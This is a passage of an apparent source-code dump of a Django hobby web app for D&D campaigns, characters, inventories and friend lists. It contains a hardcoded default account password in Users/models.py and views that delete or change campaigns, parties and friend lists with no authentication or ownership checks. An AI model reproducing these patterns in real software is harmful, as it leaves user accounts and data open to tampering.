models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n intelligence = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n wisdom = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n charisma = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n\n\n # This method returns a string that represents this class.\n # Similar to toString() from java\n def __str__(self):\n return self.characterName\n\n\n # Should associate a user with the character when initialized\n def save_model(self, request, obj, form, change):\n if obj.user == defaultUser:\n # Only set user during the first save.\n obj.user = request.user\n #super().save_model(request, obj, form, change)\n\n\n # When you create/update a character, this is where the\n # page goes to after you save the character\n def get_absolute_url(self):\n return reverse('character-detail', kwargs={'pk': self.pk})\n\n\n# This class is static, like a lookup table\nclass AbilityScore(models.Model):\n abilityName = models.CharField(max_length = MAX_LENGTH_ABILITY_NAME)\n\n# This class is dynamic, the abilityScoreValues may change\n# Now outdated, refactored so that we don't have to access another form\n# from within a form (there were 2 forms on a page, and you had to access it again)\nclass AbilityScoreSet(models.Model):\n abilityScoreSetID = models.AutoField(primary_key=True)\n character = models.ForeignKey(Character, on_delete=models.CASCADE)#, default=defaultCharacter)\n\n # One set has many ability scores.\n # However, each ability score may go to multiple sets (like an enumeration)\n # Thus a manyToMany relationship is used\n # Note: only one of the two classes should have a manyToMany Field\n # abilityScores = models.ManyToManyField(AbilityScore)\n # abilityScoreValue = models.IntegerField()\n\n strength = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n dexterity = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n constitution = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n intelligence = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n wisdom = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n charisma = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n\n # Needed to save model\n def save_model(self, request, obj, form, change):\n # Updates the character to be the one it's associated with\n # if obj.character = defaultCharacter :\n\n super().save_model(request, obj, form, change)\n\n" }, { "alpha_fraction": 0.6569263935089111, "alphanum_fraction": 0.6585497856140137, "avg_line_length": 32.272727966308594, "blob_id": "ec5ddce6c8cb4642c1a7ffb04ee6ea959bef1620", "content_id": "514c37fa9f188b412213d268aca3f5073ba594a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 68, "num_lines": 55, "path": "/Campaign_Manager/tests.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom .models import *\nfrom Character_Builder.models import *\n\n# Campaign test cases\nclass CampaignCreateTestCase(TestCase):\n def setUp(self):\n Campaign.objects.create(campaignName=\"The Mountain\")\n\n def test_campaign_name(self):\n try:\n Campaign.objects.get(campaignName=\"The Mountain\")\n except:\n self.fail()\n\n def test_campaign_id(self):\n campaign = Campaign.objects.get(campaignName=\"The Mountain\")\n self.assertEqual(campaign.campaignID, 1)\n\n# CampaignDM test cases\nclass CampaignDMCreateTestCase(TestCase):\n def setUp(self):\n Campaign.objects.create(campaignName=\"The Mountain\")\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n CampaignDM.objects.create(campaign=camp)\n\n def test_campaign_dm_id(self):\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n dm = CampaignDM.objects.get(campaign=camp)\n self.assertEqual(dm.campaignDMID, 1)\n\n def test_campaign_dm_campaign(self):\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n try:\n dm = CampaignDM.objects.get(campaign=camp)\n except:\n self.fail()\n\nclass PartyCreateTestCase(TestCase):\n def setUp(self):\n Campaign.objects.create(campaignName=\"The Mountain\")\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n Party.objects.create(campaign=camp)\n\n def test_party_id(self):\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n party = Party.objects.get(campaign=camp)\n self.assertEqual(party.partyID, 1)\n\n def test_party_campaign(self):\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n try:\n Party.objects.get(campaign=camp)\n except:\n self.fail()\n\n \n " }, { "alpha_fraction": 0.6124721765518188, "alphanum_fraction": 0.6169264912605286, "avg_line_length": 25.47058868408203, "blob_id": "c2729d265d7ab03e517d7175f3eb93130b0f13e7", "content_id": "186b6574d159e61ffe9b89bdef1d861e0bd03b37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 449, "license_type": "no_license", "max_line_length": 70, "num_lines": 17, "path": "/Campaign_Manager/templates/Campaign_Manager/campaigncomment_form.html", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "{% extends \"Campaign_Manager/campaign_base.html\" %}\n{% load crispy_forms_tags %}\n{% block content %}\n\n <h1>Post A Comment</h1>\n\n\t{% if userIsDM %}\n\t\t<form method=\"post\" class=\"post-form\" enctype=\"multipart/form-data\">\n\t \t{% csrf_token %}\n\t\t\t{{ form|crispy }}\n\t\t\t<input type=\"submit\" value=\"Post\" class=\"btn btn-dark\">\n\t\t</form>\n\t{% else %}\n\t <small class=\"text-muted\">You Must Be A DM To Comment</small>\n\t{% endif %}\n\n{% endblock content %}" }, { "alpha_fraction": 0.8219178318977356, "alphanum_fraction": 0.8219178318977356, "avg_line_length": 23.33333396911621, "blob_id": "6a5d0bef24856c6fd9ff95dee77091867162d56e", "content_id": "3f2a1eaee4a545c00aa785ae3cb8663866257f28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 146, "license_type": "no_license", "max_line_length": 32, "num_lines": 6, "path": "/Users/admin.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Profile\nfrom .models import Friend\n\nadmin.site.register(Profile)\nadmin.site.register(Friend)\n" }, { "alpha_fraction": 0.5192604064941406, "alphanum_fraction": 0.526964545249939, "avg_line_length": 22.178571701049805, "blob_id": "07dd14092655c348276b50f7c98296896b157ff0", "content_id": "e9fb252b1e3958cfd1e432a30f5cdc8036851806", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1298, "license_type": "no_license", "max_line_length": 163, "num_lines": 56, "path": "/Users/templates/Users/profile.html", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "{% extends \"Users/account_base.html\" %}\n{% block content %}\n\n<main role=\"main\" class=\"container\">\n\t<div class=\"row\">\n\t\t<div class=\"col-md-12\">\n\n\t\t\t<div class=\"content-section\">\n\t\t\t\t<h1>Current Campaigns</h1>\n\t\t\t\t<ul class=\"list-unstyled\">\n\n\t\t\t\t\t{% for Campaign in campaigns %}\n\t\t\t\t\t\t<li class=\"media\">\n\t\t\t\t\t\t\t<div class=\"media-body\">\n\t\t\t\t\t\t\t\t<h4><a href=\"{% url 'overview_with_pk' Campaign.campaignID %}\">{{ Campaign.campaignName }}</a></h4>\n\t\t\t\t\t\t\t\tCampaign ID: {{ Campaign.campaignID }}\n\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t</li>\n\t\t\t\t\t{% endfor %}\n\n\t\t\t\t</ul>\n\t\t\t</div>\n\n\t\t\t<div class=\"content-section\">\n\t\t\t\t<h1>Characters</h1>\n\t\t\t\t<ul class=\"list-unstyled\">\n\n\t\t\t\t\t{% for Character in characters %}\n\t\t\t\t\t\t\t{% if Character.user == user %}\n\t\t\t\t\t\t\t\t\t<li class=\"media \">\n\t\t\t\t\t\t\t\t\t\t<div class=\"media-body\">\n\t\t\t\t\t\t\t\t\t\t\t<h4 class=\"media-heading\">\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"{% url 'character-detail' Character.characterID %}\">{{ Character.characterName }}</a> Level {{ Character.level }} HP: {{ Character.hp }}</h4>\n\t\t\t\t\t\t\t\t\t\t\tRace: {{ Character.raceID }}\n\t\t\t\t\t\t\t\t\t\t\tClass: {{ Character.classID }}\n\t\t\t\t\t\t\t\t\t\t\tAlignment: {{ Character.alignment }}\n\t\t\t\t\t\t\t\t\t\t\tXP: {{ Character.xp }}\n\t\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t</li>\n\t\t\t\t\t\t\t{% endif %}\n\n\t\t\t\t\t{% endfor %}\n\n\t\t\t\t</ul>\n\t\t\t</div>\n\n\n\n\n\t\t</div>\n\t</div>\n</main>\n\n\n\n{% endblock content %}\n" }, { "alpha_fraction": 0.5838287472724915, "alphanum_fraction": 0.5939357876777649, "avg_line_length": 18.125, "blob_id": "89a48f2012b150a170ee30b33eccb2caf70e7a3e", "content_id": "2c25ea617b603701b4c7719f5962648f713fe14c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1682, "license_type": "no_license", "max_line_length": 60, "num_lines": 88, "path": "/Character_Builder/management/commands/populate_class_db.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.core.management.base import BaseCommand\nfrom Character_Builder.models import (\n CharacterClass\n)\n\n# Populates the user base with 2 simple default users\nclass Command(BaseCommand):\n # args = '<foo bar ...>'\n help = 'Populate the Class data base'\n\n def _create_classes(self):\n # As fighter was declared as the \"default class\", it \n # is therefore commented out here to prevent redundancy.\n # fighter = CharacterClass(\n # className='Fighter',\n # hitDice='d10'\n # )\n # fighter.save()\n\n barbarian = CharacterClass(\n className='Barbarian',\n hitDice='d12'\n )\n barbarian.save()\n\n bard = CharacterClass(\n className='Bard',\n hitDice='d8'\n )\n bard.save()\n\n cleric = CharacterClass(\n className='Cleric',\n hitDice='d8'\n )\n cleric.save()\n\n druid = CharacterClass(\n className='Druid',\n hitDice='d8'\n )\n druid.save()\n\n monk = CharacterClass(\n className='Monk',\n hitDice='d8'\n )\n monk.save()\n\n paladin = CharacterClass(\n className='Paladin',\n hitDice='d10'\n )\n paladin.save()\n\n ranger = CharacterClass(\n className='Ranger',\n hitDice='d10'\n )\n ranger.save()\n\n rogue = CharacterClass(\n className='Rogue',\n hitDice='d8'\n )\n rogue.save()\n\n sorcerer = CharacterClass(\n className='Sorcerer',\n hitDice='d6'\n )\n sorcerer.save()\n\n warlock = CharacterClass(\n className='Warlock',\n hitDice='d8'\n )\n warlock.save()\n\n wizard = CharacterClass(\n className='Wizard',\n hitDice='d6'\n )\n wizard.save()\n\n\n def handle(self, *args, **options):\n self._create_classes()" }, { "alpha_fraction": 0.6222066879272461, "alphanum_fraction": 0.6375698447227478, "avg_line_length": 38.77777862548828, "blob_id": "4bc6da86bab7e13cc42f0cae4ebb9a5ad992a00a", "content_id": "88604f6e359ab8dad7bcedbd92ff9403db10f435", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1432, "license_type": "no_license", "max_line_length": 179, "num_lines": 36, "path": "/Inventory/migrations/0001_initial.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.7 on 2019-04-08 02:08\n\nimport Inventory.models\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('Character_Builder', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Inventory',\n fields=[\n ('inventoryID', models.AutoField(primary_key=True, serialize=False)),\n ('character', models.ForeignKey(default=Inventory.models.defaultCharacter, on_delete=django.db.models.deletion.CASCADE, to='Character_Builder.Character')),\n ],\n ),\n migrations.CreateModel(\n name='Item',\n fields=[\n ('itemID', models.AutoField(primary_key=True, serialize=False)),\n ('itemName', models.CharField(max_length=255)),\n ('public', models.BooleanField(default=True)),\n ('inventory', models.ForeignKey(default=Inventory.models.defaultInventory, on_delete=django.db.models.deletion.CASCADE, to='Inventory.Inventory')),\n ('user', models.ForeignKey(blank=True, default=Inventory.models.defaultUser, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.712067723274231, "alphanum_fraction": 0.7205363512039185, "avg_line_length": 24.763635635375977, "blob_id": "36d75dbb4a3ec31ac747489434460bef940f11ef", "content_id": "0d95b03a23e0d340d6dd44d9b2fb9d97c2fc28c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1417, "license_type": "no_license", "max_line_length": 98, "num_lines": 55, "path": "/Users/models.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image\n\ndef defaultUser():\n default = User.objects.first()\n\n if default is None:\n default = User.objects.create_user('defaultUser', password='djangoproject')\n\n return default\n\nclass Profile(models.Model):\n\tuser = models.OneToOneField(User, on_delete=models.CASCADE)\n\timage = models.ImageField(default='default.png', upload_to='profile_pics')\n\n\tdef __str__(self):\n\t\treturn f'{self.user.username} Profile'\n\n\tdef save(self, **kwargs):\n\t\tsuper().save()\n\n\t\timage = Image.open(self.image.path)\n\n\t\tif image.width > 300 or image.height > 300:\n\t\t\toutput_size = (300, 300)\n\t\t\timage.thumbnail(output_size)\n\t\t\timage.save(self.image.path)\n\nclass FriendsList(models.Model):\n\towner = models.OneToOneField(User, on_delete=models.CASCADE)\n\n\tdef __str__(self):\n\t\treturn self.owner.username\n\nclass Friend(models.Model):\n\n\tusers = models.ManyToManyField(User, default=defaultUser)\n\n\tcurrent_user = models.ForeignKey(User, related_name='owner', null=True, on_delete=models.CASCADE)\n\n\n\t@classmethod\n\tdef make_friend(cls, current_user, new_friend):\n\t\tfriend, created = cls.objects.get_or_create(\n\t\t\tcurrent_user = current_user\n\t\t)\n\t\tfriend.users.add(new_friend)\n\n\t@classmethod\n\tdef unfriend(cls, current_user, new_friend):\n\t\tfriend, created = cls.objects.get_or_create(\n\t\t\tcurrent_user = current_user\n\t\t)\n\t\tfriend.users.remove(new_friend)\n" }, { "alpha_fraction": 0.7406576871871948, "alphanum_fraction": 0.7421524524688721, "avg_line_length": 29.386363983154297, "blob_id": "b49fcff838435b9fc151d9af8100a968a0d81ac6", "content_id": "d1266b39221de6157472f154c24cbac47cd91d19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1338, "license_type": "no_license", "max_line_length": 91, "num_lines": 44, "path": "/Inventory/tests.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom .models import *\nfrom Character_Builder.models import *\n\nclass ItemCreateTestCase(TestCase):\n\tdef setUp(self):\n\t\tCharacter.objects.create(characterName=\"Malikar\", alignment=\"Lawful Evil\", size=\"Medium\")\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tInventory.objects.create(character=char)\n\t\tinv = Inventory.objects.get(character=char)\n\t\tItem.objects.create(itemName=\"test item\", inventory=inv)\n\n\tdef test_inventory_id(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tinv = Inventory.objects.get(character=char)\n\t\tself.assertEqual(inv.inventoryID, 1)\n\n\tdef test_inventory_character(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\ttry:\n\t\t\tInventory.objects.get(character=char)\n\t\texcept:\n\t\t\tself.fail()\n\n\tdef test_item_id(self):\n\t\titem = Item.objects.get(itemName=\"test item\")\n\t\tself.assertEqual(item.itemID, 1)\n\n\tdef test_item_name(self):\n\t\ttry:\n\t\t\tItem.objects.get(itemName=\"test item\")\n\t\texcept:\n\t\t\tself.fail()\n\t\t\n\n\tdef test_item_inventory(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tinv = Inventory.objects.get(character=char)\n\t\titem = Item.objects.get(itemName=\"test item\")\n\t\tself.assertEqual(item.inventory, inv)\n\n\tdef test_item_public(self):\n\t\titem = Item.objects.get(itemName=\"test item\")\n\t\tself.assertEqual(item.public, True)\t\t" }, { "alpha_fraction": 0.6454206109046936, "alphanum_fraction": 0.6454206109046936, "avg_line_length": 30.098215103149414, "blob_id": "355a2bda56b5f7bd593b536f8717448eec6e1125", "content_id": "7ca7d70a7e9ce8b5e45aba03ce776e6926176d68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6966, "license_type": "no_license", "max_line_length": 86, "num_lines": 224, "path": "/Campaign_Manager/views.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom .models import *\nfrom Character_Builder.models import Character\nfrom Campaign_Manager.models import Campaign\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom .forms import CreateCampaignForm, CreatePostForm\nfrom django.views.generic import (\n ListView,\n DetailView,\n CreateView,\n UpdateView,\n DeleteView\n)\nfrom Users.models import *\nfrom .urls import *\n\ndef home(request):\n form = CreateCampaignForm(request.POST or None)\n\n if form.is_valid():\n form.instance.creator = request.user\n form.save()\n return HttpResponseRedirect(reverse('campaign-list'))\n\n\n\n context = {\n 'title' : 'Campaigns',\n 'campaigns' : Campaign.objects.all(),\n 'characters' : Character.objects.all(),\n 'partys' : Party.objects.all(),\n 'partyCharacters' : PartyCharacter.objects.all(),\n 'campaignDMs' : CampaignDM.objects.all(),\n 'form' : form,\n 'posts': CampaignComment.objects.all(),\n }\n\n return render(request, 'Campaign_Manager/campaign_builder.html', context)\n\n\ndef overview(request, pk=None ):\n\n #hazy on this. I want to set the campaign to the campaign ref'd by the pk\n campaign = Campaign.objects.get(pk=pk)\n party, created = Party.objects.get_or_create(campaign = campaign)\n members = party.members.all()\n friend, created = Friend.objects.get_or_create(current_user=request.user)\n friends = friend.users.all()\n friends |= User.objects.filter(pk = request.user.pk)\n\n friendCharacters = None\n for friend in friends:\n if friendCharacters == None:\n friendCharacters = Character.objects.filter(user = friend)\n else:\n friendCharacters |= Character.objects.filter(user = friend)\n posts = CampaignComment.objects.filter(campaign = campaign)\n dms = CampaignDM.objects.filter(campaign = campaign)\n userIsDM = False\n for dm in dms:\n if dm.user == request.user:\n userIsDM = True\n\n\n context ={\n\n 'campaign' : campaign,\n #'users' : User.objects.exclude(id=request.user.id),\n 'campaigns' : Campaign.objects.all(),\n 'characters' : Character.objects.all(),\n 'title' : 'Overview',\n 'members' : members,\n 'friends' : friends,\n 'dms' : dms,\n 'userIsDM' : userIsDM,\n 'posts' : posts,\n 'friendCharacters' : friendCharacters,\n }\n\n return render(request, 'Campaign_Manager/overview.html', context)\n\ndef update_party(request, operation, pk, id):\n new_member = Character.objects.get(pk=pk)\n campaign = Campaign.objects.get(pk=id)\n if operation == 'add':\n Party.add_member(campaign, new_member)\n elif operation == 'remove':\n Party.remove_member(campaign, new_member)\n return redirect('overview_with_pk', pk=campaign.pk)\n\ndef confirmDeletion(request, pk):\n campaign = Campaign.objects.get(pk=pk)\n\n context = {\n 'campaign' : campaign,\n\n }\n\n return render(request, 'Campaign_Manager/campaign_confirm_deletion.html', context)\n\n\ndef deleteCampaign(request, pk):\n campaign = Campaign.objects.get(pk=pk)\n #Campaign.objects.delete(campaign)\n campaign.delete()\n return redirect('campaign-list')\n\nclass CampaignListView(ListView):\n model = Campaign\n context_object_name = 'campaigns'\n\n\nclass CampaignDetailView(DetailView):\n model = Campaign\n\n def get_context_data(self, **kwargs):\n context=super().get_context_data(**kwargs)\n campaign=self.get_object()\n context['posts'] = CampaignComment.objects.filter(campaign=campaign)\n dms = CampaignDM.objects.filter(campaign=campaign)\n context['userIsDM'] = False\n for dm in dms:\n if dm.user == self.request.user:\n context['userIsDM'] = True\n\n return context\n\n\nclass CampaignCreateView(CreateView):\n model = Campaign\n fields = ['campaignName']\n\n def form_valid(self, form):\n form.instance.creator = self.request.user\n return super().form_valid(form)\n\n\nclass CampaignCommentCreateView(CreateView):\n model = CampaignComment\n form_class = CreatePostForm\n\n def get_context_data(self, **kwargs):\n context = super(CampaignCommentCreateView, self).get_context_data(**kwargs)\n campaign=Campaign.objects.get(pk=self.kwargs.get('pk'))\n dms = CampaignDM.objects.filter(campaign=campaign)\n context['userIsDM'] = False\n for dm in dms:\n if dm.user == self.request.user:\n context['userIsDM'] = True\n\n return context\n\n def form_valid(self, form):\n f = form.save(commit=False)\n f.author = self.request.user\n f.campaign = Campaign.objects.get(campaignID=self.kwargs['pk'])\n f.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('overview_with_pk', kwargs={'pk':self.kwargs['pk']})\n\n\nclass CampaignCommentDetailView(DetailView):\n model = CampaignComment\n\n def get_context_data(self, **kwargs):\n context=super(CampaignCommentDetailView, self).get_context_data(**kwargs)\n context['post'] = self.get_object()\n context['author'] = self.get_object().author\n return context\n\nclass CampaignCommentEditView(UpdateView):\n model = CampaignComment\n form_class = CreatePostForm\n\n def get_context_data(self, **kwargs):\n context = super(CampaignCommentEditView, self).get_context_data(**kwargs)\n campaign=Campaign.objects.get(pk=self.kwargs.get('fk'))\n dms = CampaignDM.objects.filter(campaign=campaign)\n context['userIsDM'] = False\n for dm in dms:\n if dm.user == self.request.user:\n context['userIsDM'] = True\n\n return context\n return context\n\n def form_valid(self, form):\n f = form.save(commit=False)\n f.author = self.request.user\n f.campaign = Campaign.objects.get(campaignID=self.kwargs['fk'])\n f.save()\n return super().form_valid(form)\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n def get_success_url(self):\n return reverse_lazy('overview_with_pk', kwargs={'pk':self.kwargs['fk']})\n\n\nclass CampaignCommentDeleteView(DeleteView):\n model = CampaignComment\n\n def get_context_data(self, **kwargs):\n context=super(CampaignCommentDeleteView, self).get_context_data(**kwargs)\n context['post'] = self.get_object()\n context['author'] = self.get_object().author\n return context\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n def get_success_url(self):\n return reverse_lazy('overview_with_pk', kwargs={'pk':self.kwargs['fk']})\n" }, { "alpha_fraction": 0.6047753691673279, "alphanum_fraction": 0.6126295924186707, "avg_line_length": 47.227272033691406, "blob_id": "ae269eb897b10b4ea14092d2faa802f4e2dacb45", "content_id": "44b08cd9a85ce7624b01c9dd9eb0187546a8fb1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3183, "license_type": "no_license", "max_line_length": 166, "num_lines": 66, "path": "/Campaign_Manager/migrations/0001_initial.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.7 on 2019-04-08 02:08\n\nimport Campaign_Manager.models\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('Character_Builder', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Campaign',\n fields=[\n ('campaignID', models.AutoField(primary_key=True, serialize=False)),\n ('campaignName', models.CharField(max_length=255)),\n ('image', models.ImageField(default='default_campaign.jpg', upload_to='campaign_pics')),\n ('creator', models.ForeignKey(default=Campaign_Manager.models.defaultUser, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='CampaignComment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=100)),\n ('content', models.TextField()),\n ('date', models.DateTimeField(default=django.utils.timezone.now)),\n ('image', models.ImageField(null=True, upload_to='comment_pics')),\n ('slug', models.SlugField(default='default-slug')),\n ('author', models.ForeignKey(default=Campaign_Manager.models.defaultUser, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ('campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Campaign_Manager.Campaign')),\n ],\n ),\n migrations.CreateModel(\n name='CampaignDM',\n fields=[\n ('campaignDMID', models.AutoField(primary_key=True, serialize=False)),\n ('campaign', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='Campaign_Manager.Campaign')),\n ('user', models.ForeignKey(default=Campaign_Manager.models.defaultUser, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Party',\n fields=[\n ('partyID', models.AutoField(primary_key=True, serialize=False)),\n ('campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='campaign', to='Campaign_Manager.Campaign')),\n ('members', models.ManyToManyField(to='Character_Builder.Character')),\n ],\n ),\n migrations.CreateModel(\n name='PartyCharacter',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('approved', models.BooleanField(default=False)),\n ('character', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Character_Builder.Character')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.6423316597938538, "alphanum_fraction": 0.6423316597938538, "avg_line_length": 31.127273559570312, "blob_id": "7de030f3deacadabd4523959c314d99c8fb6a01a", "content_id": "b41403ae24eec28ce1b9648eee10ece4f6922abf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3534, "license_type": "no_license", "max_line_length": 94, "num_lines": 110, "path": "/Users/views.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.forms import User\nfrom django.contrib import messages\nfrom .forms import UserRegistrationForm, UserUpdateForm, ProfileUpdateForm\nfrom Campaign_Manager .models import Campaign, Party, PartyCharacter\nfrom Character_Builder.models import Character\nfrom .models import Friend\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Your account has been created! Please log in')\n return redirect('login')\n else:\n form = UserRegistrationForm()\n return render(request, 'Users/register.html', {'form': form})\n\ndef profile(request, pk=None ):\n\n if pk:\n user = User.objects.get(pk=pk)\n else:\n user = request.user\n\n myCharacters = Character.objects.filter(user=user)\n allCampaigns = Campaign.objects.all()\n myCampaigns = Campaign.objects.filter(creator=user)\n\n characterCampaigns = None\n for mc in myCharacters:\n if characterCampaigns==None:\n characterCampaigns = PartyCharacter.objects.filter(character=mc)\n else:\n characterCampaigns |= PartyCharacter.objects.filter(character=mc)\n\n if characterCampaigns != None:\n for cc in characterCampaigns:\n primaryKey=cc.party.campaign.pk\n myCampaigns |= Campaign.objects.filter(pk=primaryKey)\n\n for camp in allCampaigns:\n parties = Party.objects.filter(campaign=camp)\n\n for party in parties:\n for mem in party.members.all():\n for char in myCharacters:\n if mem == char:\n campSet = Campaign.objects.filter(pk=camp.pk)\n myCampaigns |= campSet\n\n\n context ={\n\n 'user' : user,\n 'users' : User.objects.exclude(id=request.user.id),\n 'campaigns' : myCampaigns,\n 'characters' : myCharacters,\n 'title' : 'Profile',\n\n }\n\n return render(request, 'Users/profile.html', context)\n\ndef friends(request):\n\n user = User.objects.exclude(id=request.user.id)\n friend, created = Friend.objects.get_or_create(current_user=request.user)\n friends = friend.users.all()\n\n context = {\n 'title' : 'Friends List',\n 'users' : user,\n 'friends': friends,\n }\n\n return render(request, 'Users/friends.html', context)\n\ndef edit_profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n\n messages.success(request, f'Your account has been updated!')\n return redirect('profile')\n else:\n u_form = UserUpdateForm(instance=request.user)\n p_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form\n }\n\n return render(request, 'Users/edit_profile.html', context)\n\ndef update_friends(request, operation, pk):\n friend = User.objects.get(pk=pk)\n if operation == 'add':\n Friend.make_friend(request.user, friend)\n elif operation == 'remove':\n Friend.unfriend(request.user, friend)\n return redirect('friends')\n" }, { "alpha_fraction": 0.7478005886077881, "alphanum_fraction": 0.7478005886077881, "avg_line_length": 21.600000381469727, "blob_id": "d35cc7aea1a28cf2b93fd1fd2ced88ee625e89a7", "content_id": "01a1cd87aabe98151ef20b0a4b9cfe551ec04598", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 341, "license_type": "no_license", "max_line_length": 45, "num_lines": 15, "path": "/Campaign_Manager/forms.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import Campaign, CampaignComment\n\nclass CreateCampaignForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Campaign\n\t\tfields = ['campaignName']\n\nclass CreatePostForm(forms.ModelForm):\n\n\timage = forms.ImageField(required=False)\n\n\tclass Meta:\n\t\tmodel = CampaignComment\n\t\tfields = ['title', 'content', 'image']\n\n\n" }, { "alpha_fraction": 0.57833331823349, "alphanum_fraction": 0.6016666889190674, "avg_line_length": 19.176469802856445, "blob_id": "72d1588ab89fd7eb0de3c15b9c5a3b2414ea36df", "content_id": "85ade15bea315576e4cb1840200b68e6d819dbb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2400, "license_type": "no_license", "max_line_length": 68, "num_lines": 119, "path": "/Character_Builder/management/commands/populate_race_db.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.core.management.base import BaseCommand\nfrom Character_Builder.models import (\n CharacterRace\n)\n\n# Run this with \"python manage.py populate_race_db\"\n# This is an\n\nclass Command(BaseCommand):\n args = '<foo bar ...>'\n help = 